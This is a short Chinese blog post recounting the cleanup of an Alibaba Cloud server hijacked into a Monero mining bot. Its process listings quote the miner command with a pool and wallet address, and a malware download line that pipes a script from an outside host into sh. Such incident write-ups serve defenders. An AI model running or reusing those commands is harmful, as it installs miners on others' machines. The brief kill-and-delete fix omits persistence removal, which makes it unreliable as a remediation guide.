欢迎光临
我们一直在努力

阿里云服务器被劫持成挖矿肉鸡的修复过程

一台不太用阿里云服务器被运营报告连不上。putty登录查看发现全是一个叫yam的进程。

上网查了一下,可能是被做成挖矿机了。

先查看进程

ps aux |grep yam

结果如下

root 670 0.9 1.8 188648 18456 ? Sl Nov22 212:41 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 904 0.9 2.0 188648 20556 ? Sl Nov22 212:20 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 1462 0.9 2.0 188648 20396 ? Sl Nov22 211:58 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 1976 0.9 1.4 188648 14464 ? Sl Nov22 211:35 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 2520 0.9 0.6 188648 6640 ? Sl Nov22 211:08 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
....

先把进程杀掉

 killall -9 yam

再查看所有进程

ps aut

root 28658 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty1 root 28659 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty2 root 28660 0.0 0.0 4064 72 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty3 root 28661 0.0 0.0 4064 72 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty4 root 28662 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty5 root 28808 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty6 root 29794 0.0 0.0 106092 148 ? Ss Nov21 0:00 /bin/sh -c curl -fsSL http://www.haveabitchin.com/pm.sh?1118 | sh root 29797 0.0 0.0 106096 156 ? S Nov21 0:00 sh root 29915 0.0 0.4 208564 4596 ? Sl Nov21 1:57 /tmp/duckduckgo 

发现这一段明显是劫持过程。

然后把这些文件全部删除。

完毕。

 

  • 海报
海报图正在生成中...
赞(0) 打赏
声明:
1、本博客不从事任何主机及服务器租赁业务,不参与任何交易,也绝非中介。博客内容仅记录博主个人感兴趣的服务器测评结果及一些服务器相关的优惠活动,信息均摘自网络或来自服务商主动提供;所以对本博客提及的内容不作直接、间接、法定、约定的保证,博客内容也不具备任何参考价值及引导作用,访问者需自行甄别。
2、访问本博客请务必遵守有关互联网的相关法律、规定与规则;不能利用本博客所提及的内容从事任何违法、违规操作;否则造成的一切后果由访问者自行承担。
3、未成年人及不能独立承担法律责任的个人及群体请勿访问本博客。
4、一旦您访问本博客,即表示您已经知晓并接受了以上声明通告。
文章名称:《阿里云服务器被劫持成挖矿肉鸡的修复过程》
文章链接:https://www.456zj.com/4166.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址